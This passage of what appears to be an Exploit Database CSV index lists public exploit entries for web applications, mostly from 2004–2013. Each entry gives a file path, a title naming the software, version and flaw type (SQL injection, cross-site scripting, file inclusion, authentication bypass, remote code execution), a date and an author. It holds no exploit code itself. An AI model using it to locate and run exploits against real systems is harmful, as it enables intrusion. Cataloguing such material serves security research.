Scripting",2004-11-26,"Cyrille Barthelemy",php,webapps, -24783,exploits/php/webapps/24783.txt,"pntresmailer 6.0 - Directory Traversal",2004-11-26,"John Cobb",php,webapps, -24786,exploits/jsp/webapps/24786.txt,"Cisco Video Surveillance Operations Manager 6.3.2 - Multiple Vulnerabilities",2013-03-15,Bassem,jsp,webapps, -24789,exploits/php/webapps/24789.rb,"WordPress Plugin LeagueManager 3.8 - SQL Injection",2013-03-15,"Joshua Reynolds",php,webapps, -24790,exploits/php/webapps/24790.txt,"ClipShare 4.1.4 - Multiple Vulnerabilities",2013-03-15,AkaStep,php,webapps, -24791,exploits/java/webapps/24791.txt,"Open-Xchange Server 6 - Multiple Vulnerabilities",2013-03-15,"Martin Braun",java,webapps, -24792,exploits/multiple/webapps/24792.txt,"IPCop 1.4.1 - Web Administration Interface Proxy Log HTML Injection",2004-11-30,"Paul Kurczaba",multiple,webapps, -24796,exploits/php/webapps/24796.txt,"Blog Torrent 0.8 - Directory Traversal",2004-12-02,"Steve Kemp",php,webapps, -24797,exploits/php/webapps/24797.txt,"Advanced Guestbook 2.2/2.3 - Cross-Site Scripting",2004-12-02,"Emile van Elen",php,webapps, -24798,exploits/php/webapps/24798.txt,"PAFileDB 3.1 - Error Message Full Path Disclosure",2004-12-04,y3dips,php,webapps, -24803,exploits/php/webapps/24803.txt,"Blog Torrent 0.80 - 'BTDownload.php' Cross-Site Scripting",2004-12-07,Lostmon,php,webapps, -24806,exploits/php/webapps/24806.txt,"darryl burgdorf weblibs 1.0 - Directory Traversal",2004-12-07,"John Bissell",php,webapps, -24810,exploits/php/webapps/24810.txt,"PHPGedView 2.x - 'Descendancy.php' Cross-Site Scripting",2004-01-19,JeiAr,php,webapps, -24814,exploits/php/webapps/24814.txt,"PHPGedView 2.5/2.6 - 'index.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps, -24816,exploits/php/webapps/24816.txt,"PHPGedView 2.5/2.6 - 'Individual.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps, -24817,exploits/php/webapps/24817.txt,"phpMyAdmin 2.x - External Transformations Remote Command Execution",2004-12-13,"Nicolas Gregoire",php,webapps, -24819,exploits/php/webapps/24819.txt,"PHPGedView 2.5/2.6 - 'Source.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps, -24820,exploits/php/webapps/24820.txt,"PHPGedView 2.5/2.6 - 'Imageview.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps, -24821,exploits/php/webapps/24821.txt,"PHPGedView 2.5/2.6 - 'Gedrecord.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps, -24822,exploits/php/webapps/24822.txt,"PHPGedView 2.5/2.6 - 'Gdbi_interface.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps, -24823,exploits/php/webapps/24823.txt,"sugarsales 1.x/2.0 - Multiple Vulnerabilities",2004-12-13,"Daniel Fabian",php,webapps, -24824,exploits/php/webapps/24824.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php?Cat' Cross-Site Scripting",2004-12-13,"dw. & ms.",php,webapps, -24825,exploits/php/webapps/24825.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php?Cat' Cross-Site Scripting",2004-12-13,"dw. & ms.",php,webapps, -24826,exploits/php/webapps/24826.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php?Cat' Cross-Site Scripting",2004-12-13,"dw. & ms.",php,webapps, -24827,exploits/php/webapps/24827.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php?Cat' Cross-Site Scripting",2004-12-13,"dw. & ms.",php,webapps, -24829,exploits/php/webapps/24829.txt,"PHPGedView 2.5/2.6 - 'login.php?URL' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps, -24830,exploits/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php?Username' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps, -24831,exploits/php/webapps/24831.txt,"PHPGedView 2.5/2.6 - 'login.php' Newlanguage Cross-Site Scripting",2004-01-12,JeiAr,php,webapps, -24832,exploits/php/webapps/24832.txt,"PHPGedView 2.5/2.6 - 'Relationship.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps, -24834,exploits/php/webapps/24834.txt,"PHPGedView 2.5/2.6 - 'calendar.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps, -24835,exploits/php/webapps/24835.txt,"PHPGedView 2.5/2.6 - 'Placelist.php' SQL Injection",2004-01-12,JeiAr,php,webapps, -24836,exploits/cgi/webapps/24836.txt,"UseModWiki 1.0 - Wiki.pl Cross-Site Scripting",2004-12-14,"Jeremy Bae",cgi,webapps, -24837,exploits/php/webapps/24837.txt,"PHPGedView 2.5/2.6 - 'Timeline.php' SQL Injection",2004-01-12,JeiAr,php,webapps, -24838,exploits/asp/webapps/24838.txt,"Active Server Corner ASP Calendar 1.0 - Administrative Access",2004-12-14,"ali reza AcTiOnSpIdEr",asp,webapps, -24840,exploits/asp/webapps/24840.txt,"ASP-Rider - SQL Injection",2004-12-14,"Shervin Khaleghjou",asp,webapps, -24842,exploits/php/webapps/24842.txt,"IWebNegar - Multiple SQL Injections",2004-12-15,"Shervin Khaleghjou",php,webapps, -24844,exploits/php/webapps/24844.txt,"phpGroupWare 0.9.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-15,"James Bercegay",php,webapps, -24845,exploits/php/webapps/24845.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' Cross-Site Scripting",2004-12-15,"James Bercegay",php,webapps, -24846,exploits/php/webapps/24846.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' SQL Injection",2004-12-15,"James Bercegay",php,webapps, -24847,exploits/php/webapps/24847.txt,"phpGroupWare 0.9.x - 'index.php' Multiple SQL Injections",2004-12-15,"James Bercegay",php,webapps, -24849,exploits/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",php,webapps, -24850,exploits/php/webapps/24850.txt,"WordPress Plugin Simply Poll 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps, -24851,exploits/php/webapps/24851.txt,"Joomla! Component com_rsfiles - 'cid' SQL Injection",2013-03-18,ByEge,php,webapps, -24858,exploits/php/webapps/24858.html,"WordPress Plugin Occasions 1.0.4 - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps, -24859,exploits/php/webapps/24859.rb,"WordPress Plugin Count Per Day 3.2.5 - 'counter.php' Cross-Site Scripting",2013-03-19,m3tamantra,php,webapps, -24860,exploits/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - Cross-Site Request Forgery",2013-03-19,"Jacob Holcomb",hardware,webapps, -24861,exploits/php/webapps/24861.txt,"Rebus:list - 'list.php?list_id' SQL Injection",2013-03-19,"Robert Cooper",php,webapps, -24862,exploits/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps, -24864,exploits/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - 'Username'/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps, -24867,exploits/php/webapps/24867.html,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps, -24868,exploits/php/webapps/24868.rb,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,php,webapps, -24869,exploits/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps, -24870,exploits/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - 'index.php' Local File Inclusion",2013-03-22,DaOne,php,webapps, -24871,exploits/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps, -24873,exploits/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps, -24877,exploits/php/webapps/24877.txt,"OpenCart 1.5.5.1 - 'FileManager.php' Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps, -24879,exploits/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQL Injections",2013-03-25,"Saadi Siddiqui",php,webapps, -24881,exploits/php/webapps/24881.txt,"ClipShare 4.1.1 - 'gid' Blind SQL Injection",2013-03-25,Esac,php,webapps, -24882,exploits/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps, -24883,exploits/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,php,webapps, -24893,exploits/php/webapps/24893.txt,"PsychoStats 3.2.2b - 'awards.php' Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps, -24894,exploits/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilities",2013-03-27,Esac,php,webapps, -24898,exploits/php/webapps/24898.txt,"SynConnect Pms - 'index.php?loginid' SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps, -24901,exploits/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps, -24906,exploits/php/webapps/24906.txt,"AWS Xms 2.5 - 'importer.php?what' Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps, -24911,exploits/php/webapps/24911.txt,"Pollen CMS 0.6 - 'index.php?p' Paramete' Local File Disclosure",2013-04-02,MizoZ,php,webapps, -24913,exploits/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps, -24914,exploits/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps, -24915,exploits/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps, -24916,exploits/hardware/webapps/24916.txt,"NETGEAR WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps, -24924,exploits/hardware/webapps/24924.txt,"Belkin Wemo - Arbitrary Firmware Upload",2013-04-08,"Daniel Buentello",hardware,webapps, -24926,exploits/hardware/webapps/24926.txt,"D-Link - Multiple Vulnerabilities",2013-04-08,m-1-k-3,hardware,webapps, -24927,exploits/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,php,webapps, -24928,exploits/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - Cross-Site Request Forgery",2013-04-08,Un0wn_X,hardware,webapps, -24932,exploits/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps, -24934,exploits/php/webapps/24934.txt,"WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php?hash' SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps, -24957,exploits/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps, -24969,exploits/php/webapps/24969.txt,"Joomla! Component com_civicrm 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps, -24942,exploits/php/webapps/24942.txt,"ZAPms 1.41 - SQL Injection",2013-04-09,NoGe,php,webapps, -27434,exploits/php/webapps/27434.txt,"Oxynews - 'index.php' SQL Injection",2006-03-16,R00T3RR0R,php,webapps, -27435,exploits/php/webapps/27435.txt,"phpMyAdmin 2.8.1 - Set_Theme Cross-Site Scripting",2006-03-16,"Ali Asad",php,webapps, -27436,exploits/php/webapps/27436.txt,"Invision Power Services Invision Board 2.0.4 - Search Action Multiple Cross-Site Scripting Vulnerabilities",2006-03-17,Mr.SNAKE,php,webapps, -24953,exploits/php/webapps/24953.txt,"Free Monthly Websites 2.0 - Admin Password Change",2013-04-12,"Yassin Aboukir",php,webapps, -24954,exploits/php/webapps/24954.txt,"Simple HRM System 2.3 - Multiple Vulnerabilities",2013-04-12,Doraemon,php,webapps, -24959,exploits/php/webapps/24959.txt,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,php,webapps, -24960,exploits/php/webapps/24960.txt,"phpVms Virtual Airline Administration 2.1.934/2.1.935 - SQL Injection",2013-04-15,NoGe,php,webapps, -24964,exploits/windows/webapps/24964.txt,"Oracle WebCenter Sites Satellite Server - HTTP Header Injection",2013-04-18,"SEC Consult",windows,webapps, -24965,exploits/php/webapps/24965.txt,"KrisonAV CMS 3.0.1 - Multiple Vulnerabilities",2013-04-18,"High-Tech Bridge SA",php,webapps, -24967,exploits/multiple/webapps/24967.txt,"Nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",multiple,webapps, -25090,exploits/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass",2005-02-08,"Albania Security Clan",php,webapps, -25816,exploits/php/webapps/25816.txt,"Ovidentia FX - Remote File Inclusion",2005-06-10,Status-x,php,webapps, -25817,exploits/cgi/webapps/25817.txt,"JamMail 1.8 - Jammail.pl Arbitrary Command Execution",2005-06-12,blahplok,cgi,webapps, -25818,exploits/php/webapps/25818.txt,"Singapore 0.9.11 Beta Image Gallery - 'index.php' Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps, -24973,exploits/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps, -24975,exploits/hardware/webapps/24975.txt,"D-Link DIR-615 Rev D3 / DIR-300 Rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps, -25089,exploits/php/webapps/25089.txt,"PHP-Fusion 4.0 - 'Viewthread.php' Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps, -24986,exploits/cgi/webapps/24986.txt,"IkonBoard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps, -24987,exploits/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps, -24988,exploits/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - '/wp-admin/post.php?content' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps, -24989,exploits/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 - '/wp-admin/templates.php?file' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps, -24990,exploits/php/webapps/24990.txt,"WordPress 1.2.1/1.2.2 - 'link-add.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-16,"Thomas Waldegger",php,webapps, -24991,exploits/php/webapps/24991.txt,"WordPress 1.2.1/1.2.2 - 'link-categories.php?cat_id' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps, -24992,exploits/php/webapps/24992.txt,"WordPress 1.2.1/1.2.2 - 'link-manager.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-16,"Thomas Waldegger",php,webapps, -24993,exploits/php/webapps/24993.txt,"WordPress 1.2.1/1.2.2 - 'moderation.php?item_approved' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps, -24994,exploits/php/webapps/24994.txt,"MediaWiki 1.3.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps, -25184,exploits/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injections",2005-03-02,"benji lemien",php,webapps, -25185,exploits/php/webapps/25185.txt,"D-Forum 1.11 - 'Nav.php3' Cross-Site Scripting",2005-03-03,benjilenoob,php,webapps, -25186,exploits/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension - SQL Injection",2005-03-03,"Fabian Becker",php,webapps, -25189,exploits/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion",2005-03-04,"Filip Groszynski",php,webapps, -25192,exploits/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion",2005-03-05,mozako,php,webapps, -25193,exploits/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 - Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps, -29278,exploits/php/webapps/29278.pl,"Work System eCommerce 3.0.3/3.0.4 - 'forum.php' Remote File Inclusion",2006-12-13,the_Edit0r,php,webapps, -25002,exploits/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection",2013-04-25,"Joseph Sheridan",php,webapps, -25003,exploits/php/webapps/25003.txt,"phpMyAdmin 3.5.8/4.0.0-RC2 - Multiple Vulnerabilities",2013-04-25,waraxe,php,webapps, -25014,exploits/php/webapps/25014.txt,"WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,php,webapps, -25183,exploits/php/webapps/25183.txt,"ProjectBB 0.4.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"benji lemien",php,webapps, -25024,exploits/hardware/webapps/25024.txt,"D-Link DIR-635 - Multiple Vulnerabilities",2013-04-26,m-1-k-3,hardware,webapps, -25037,exploits/php/webapps/25037.txt,"Kayako eSupport 2.x - 'index.php' Knowledgebase Cross-Site Scripting",2004-12-18,"James Bercegay",php,webapps, -25038,exploits/php/webapps/25038.txt,"Kayako eSupport 2.x - Ticket System Multiple SQL Injections",2004-12-18,"James Bercegay",php,webapps, -25041,exploits/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal",2004-12-20,white_e@nogimmick.org,cgi,webapps, -25042,exploits/cgi/webapps/25042.txt,"Tlen.pl 5.23.4.1 - Instant Messenger Remote Script Execution",2004-12-20,"Jaroslaw Sajko",cgi,webapps, -25043,exploits/php/webapps/25043.txt,"phpGroupWare 0.9.14 - 'Tables_Update.Inc.php' Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps, -25044,exploits/php/webapps/25044.txt,"phpGroupWare 0.9.x - 'index.php' HTML Injection",2004-01-27,"Cedric Cochin",php,webapps, -25045,exploits/php/webapps/25045.txt,"2BGal 2.5.1 - SQL Injection",2004-12-22,zib,php,webapps, -25051,exploits/cgi/webapps/25051.txt,"Wirtualna Polska WPKontakt 3.0.1 - Remote Script Execution",2004-12-23,"Poznan Supercomputing",cgi,webapps, -25052,exploits/php/webapps/25052.pl,"Siteman 1.1 - User Database Privilege Escalation (1)",2005-01-19,"Noam Rathaus",php,webapps, -25053,exploits/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation (2)",2005-01-19,amironline452,php,webapps, -25058,exploits/php/webapps/25058.txt,"Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-25,y3dips,php,webapps, -25059,exploits/php/webapps/25059.txt,"MercuryBoard 1.1 - Multiple Input Validation Vulnerabilities",2005-01-25,"Alberto Trivero",php,webapps, -25060,exploits/asp/webapps/25060.txt,"Comersus Cart 5.0/6.0 - Multiple Vulnerabilities",2005-01-25,"raf somers",asp,webapps, -25062,exploits/php/webapps/25062.txt,"Comdev eCommerce 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-01-25,SmOk3,php,webapps, -25064,exploits/php/webapps/25064.txt,"Magic Winmail Server 4.0 (Build 1112) - 'download.php' Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps, -25065,exploits/php/webapps/25065.txt,"Magic Winmail Server 4.0 (Build 1112) - 'upload.php' Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",php,webapps, -25067,exploits/cgi/webapps/25067.txt,"alt-n WebAdmin 3.0.2 - Multiple Vulnerabilities",2005-01-28,"David A. P?rez",cgi,webapps, -25068,exploits/php/webapps/25068.txt,"IceWarp Web Mail 5.3 - login.html 'Username' Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps, -25069,exploits/php/webapps/25069.txt,"IceWarp Web Mail 5.3 - 'accountsettings_add.html?accountid' Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps, -25071,exploits/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 - Full Path Disclosure",2005-01-29,steven@lovebug.org,php,webapps, -25074,exploits/php/webapps/25074.txt,"XOOPS Module module 3.0 - Directory Traversal",2005-01-28,Lostmon,php,webapps, -25078,exploits/asp/webapps/25078.txt,"Eurofull E-Commerce - 'Mensresp.asp' Cross-Site Scripting",2005-02-02,Yani-ari,asp,webapps, -25084,exploits/asp/webapps/25084.txt,"Microsoft Outlook 2003 - Web Access Login Form Remote URI redirection",2005-02-07,"Morning Wood",asp,webapps, -25086,exploits/windows/webapps/25086.pl,"Ipswitch IMail 11.01 - Cross-Site Scripting",2013-04-29,DaOne,windows,webapps, -25087,exploits/php/webapps/25087.txt,"Joomla! 3.0.3 - 'remember.php' PHP Object Injection",2013-04-26,EgiX,php,webapps, -25088,exploits/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps, -25093,exploits/php/webapps/25093.txt,"MercuryBoard 1.1 - 'index.php' SQL Injection",2005-02-09,Zeelock,php,webapps, -25096,exploits/cgi/webapps/25096.txt,"AWStats 5.x/6.x - Debug Remote Information Disclosure",2005-02-14,GHC,cgi,webapps, -25097,exploits/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php?language' Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps, -25098,exploits/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php?language' Traversal Arbitrary File Access",2005-02-14,"John Cobb",php,webapps, -25099,exploits/php/webapps/25099.txt,"CitrusDB 0.3.6 - 'importcc.php' Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps, -25100,exploits/php/webapps/25100.txt,"CitrusDB 0.3.6 - 'uploadcc.php' Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps, -25101,exploits/php/webapps/25101.txt,"CitrusDB 0.3.6 - 'importcc.php' CSV File SQL Injection",2005-02-15,"RedTeam Pentesting",php,webapps, -25102,exploits/php/webapps/25102.txt,"CitrusDB 0.3.6 - Remote Authentication Bypass",2004-02-15,"RedTeam Pentesting",php,webapps, -25103,exploits/php/webapps/25103.txt,"PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-15,waraxe,php,webapps, -25104,exploits/php/webapps/25104.txt,"CitrusDB 0.3.6 - Arbitrary Local PHP File Inclusion",2005-02-15,"RedTeam Pentesting",php,webapps, -25105,exploits/php/webapps/25105.txt,"osCommerce 2.2 - 'Contact_us.php' Cross-Site Scripting",2005-02-15,"John Cobb",php,webapps, -25108,exploits/cgi/webapps/25108.txt,"AWStats 5.x/6.x - 'Logfile' Remote Command Execution",2005-02-16,newbug@chroot.org,cgi,webapps, -25109,exploits/php/webapps/25109.txt,"DCP-Portal 6.1.1 - Multiple SQL Injections",2005-02-16,Exoduks,php,webapps, -25110,exploits/asp/webapps/25110.txt,"Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-16,"Andrey Rusyaev",asp,webapps, -25111,exploits/php/webapps/25111.txt,"PaNews 2.0 - Cross-Site Scripting",2005-02-16,pi3ch,php,webapps, -25112,exploits/php/webapps/25112.txt,"MercuryBoard Forum 1.0/1.1 - Cross-Site Scripting",2005-02-16,Lostmon,php,webapps, -25113,exploits/php/webapps/25113.txt,"WebCalendar 0.9.45 - SQL Injection",2005-02-17,"Michael Scovetta",php,webapps, -25114,exploits/php/webapps/25114.txt,"paFaq beta4 - 'question.php' Multiple SQL Injections",2005-02-17,pi3ch,php,webapps, -25115,exploits/php/webapps/25115.txt,"paFaq beta4 - 'answer.php?offset' SQL Injection",2005-02-17,pi3ch,php,webapps, -25116,exploits/php/webapps/25116.txt,"paFaq beta4 - 'search.php?search_item' SQL Injection",2005-02-17,pi3ch,php,webapps, -25117,exploits/php/webapps/25117.txt,"paFaq beta4 - 'comment.php' Multiple SQL Injections",2005-02-17,pi3ch,php,webapps, -25118,exploits/php/webapps/25118.txt,"BibORB 1.3.2 - 'bibindex.php?search' Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps, -25119,exploits/php/webapps/25119.txt,"BibORB 1.3.2 - Add Database 'Description' Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps, -25120,exploits/php/webapps/25120.txt,"BibORB 1.3.2 - 'index.php' Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",php,webapps, -25121,exploits/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple SQL Injections",2005-02-17,"Patrick Hof",php,webapps, -25123,exploits/php/webapps/25123.txt,"TrackerCam 5.12 - ''ComGetLogFile.php3?fm' Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps, -25125,exploits/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps, -25126,exploits/php/webapps/25126.txt,"EggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps, -25127,exploits/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Inclusion",2005-02-19,kc,php,webapps, -25138,exploits/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps, -25139,exploits/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps, -25142,exploits/hardware/webapps/25142.txt,"D-Link DNS-323 - Multiple Vulnerabilities",2013-05-02,sghctoma,hardware,webapps, -25143,exploits/php/webapps/25143.txt,"Invision Power Board 1.x/2.0.3 - SML Code Script Injection",2005-02-21,"Daniel A.",php,webapps, -25145,exploits/php/webapps/25145.txt,"PANews 2.0 - PHP Remote Code Execution",2005-02-21,tjomka,php,webapps, -25147,exploits/cgi/webapps/25147.txt,"Biz Mail Form 2.x - Unauthorized Mail Relay",2005-02-22,"Jason Frisvold",cgi,webapps, -25148,exploits/asp/webapps/25148.txt,"Mono 1.0.5 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",asp,webapps, -25149,exploits/php/webapps/25149.txt,"iGeneric iG Shop 1.x - Multiple SQL Injections",2005-02-22,"John Cobb",php,webapps, -25151,exploits/php/webapps/25151.txt,"PBLang Bulletin Board System 4.6 - 'search.php' Cross-Site Scripting",2005-02-23,"Hackerlounge Research Group",php,webapps, -25152,exploits/php/webapps/25152.txt,"phpMyAdmin 2.6 - 'select_server.lib.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps, -25153,exploits/php/webapps/25153.txt,"phpMyAdmin 2.6 - 'display_tbl_links.lib.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps, -25154,exploits/php/webapps/25154.txt,"phpMyAdmin 2.6 - 'theme_left.css.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps, -25155,exploits/php/webapps/25155.txt,"phpMyAdmin 2.6 - 'theme_right.css.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps, -25156,exploits/php/webapps/25156.txt,"phpMyAdmin 2.6 - Multiple Local File Inclusions",2005-02-24,"Maksymilian Arciemowicz",php,webapps, -25158,exploits/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps, -25159,exploits/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps, -25160,exploits/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps, -25161,exploits/php/webapps/25161.txt,"phpWebSite 0.x - Image File Processing Arbitrary '.PHP' File Upload",2005-02-24,tjomka,php,webapps, -25162,exploits/php/webapps/25162.txt,"CubeCart 2.0.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-25,Lostmon,php,webapps, -25168,exploits/php/webapps/25168.c,"phpBB 2.0.x - Authentication Bypass (1)",2005-02-28,Paisterist,php,webapps, -25169,exploits/php/webapps/25169.pl,"phpBB 2.0.x - Authentication Bypass (2)",2005-02-28,phuket,php,webapps, -25170,exploits/php/webapps/25170.cpp,"phpBB 2.0.x - Authentication Bypass (3)",2005-02-28,overdose,php,webapps, -25172,exploits/php/webapps/25172.txt,"PostNuke Phoenix 0.7x - 'CATID' SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps, -25173,exploits/php/webapps/25173.txt,"PostNuke Phoenix 0.7x - 'SHOW' SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps, -25174,exploits/php/webapps/25174.txt,"PHPCOIN 1.2 - 'mod.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-01,Lostmon,php,webapps, -25175,exploits/php/webapps/25175.txt,"PHPCOIN 1.2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-01,Lostmon,php,webapps, -25176,exploits/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x - 'SendPM.php' Directory Traversal",2005-03-01,Raven,php,webapps, -25177,exploits/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection",2005-03-01,FraMe,php,webapps, 